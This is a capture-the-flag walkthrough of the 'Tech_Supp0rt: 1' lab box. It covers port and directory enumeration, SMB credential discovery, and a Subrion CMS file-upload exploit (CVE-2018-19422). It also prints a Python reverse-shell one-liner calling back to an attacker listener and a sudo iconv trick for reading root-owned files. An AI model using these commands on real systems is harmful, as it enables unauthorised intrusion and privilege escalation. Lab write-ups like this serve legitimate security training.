Title: Tech_Supp0rt: 1

sudo nmap -sC -sV 10.10.21.140  -oA nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 08:24 EDT
Nmap scan report for 10.10.21.140
Host is up (0.17s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-04-16T12:24:35
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-04-16T17:54:36+05:30
|_clock-skew: mean: -1h49m57s, deviation: 3h10m30s, median: 1s

From the above scan we find open ports 
-22(ssh)
-80(web-server)
-139,445(smb)


before manually inspecting the page we run gobuster in the background 

gobuster dir -u http://10.10.21.140/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --no-progress
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.21.140/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/16 08:45:17 Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.21.140/wordpress/]
/test                 (Status: 301) [Size: 311] [--> http://10.10.21.140/test/]     

we also have smb open

smbclient -L \\\\$IP

smclient \\\\$IP\\websrv
if we had write access we could put a reverse shell.

so we get the file enter.txt in which we find "subrion" credentials

we got a new dir "/subrion" and admin creds, we decode the password with cyberchef

we check port 80 and it's the apache default page, we check the source code in case we find anything useful but nothing came up.

On trying to access /subrion endpoint we get a failed to connect error from the web server. we intercept it with burp suite and we see that the endpoint URL is invalid. After researcing we found some subdirectories we can try to access.

when trying /subrion/robots.txt it worked.

then we try /subrion/panel/ and we can login with the creds

we have the cms version and name so we can check for an exploit

i think the best way would be to use searchsploit "subrion cms". i just google it online until i found cve CVE-2018-19422.
“Subrion CMS 4.2.1 — Arbitrary File Upload”

we run the script python3 exploi.py url -l user -p pass

and we got a remote code execution on the web server.

Next step was to get a shell on the box.

we run in our machine nc -lvnp 4444

then we run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

and got shell on the box.

python3 -c 'import pty; pty.spawn("/bin/bash")'

looking around trying to find a way of escalating privileges i remembered there is a wordpress site.
/var/www/html/wordpress

there is a wp-config file in which there is a password. We try that password on user "scamsite" which we found in /home directory

su scamsite

next to escalate our privileges as root

sudo -l

we can run "iconv" 

we use gtfobins

sudo -u root iconv  -f 8859_1 -t 8859_1 "/root/root.txt"

and we get our root flag.
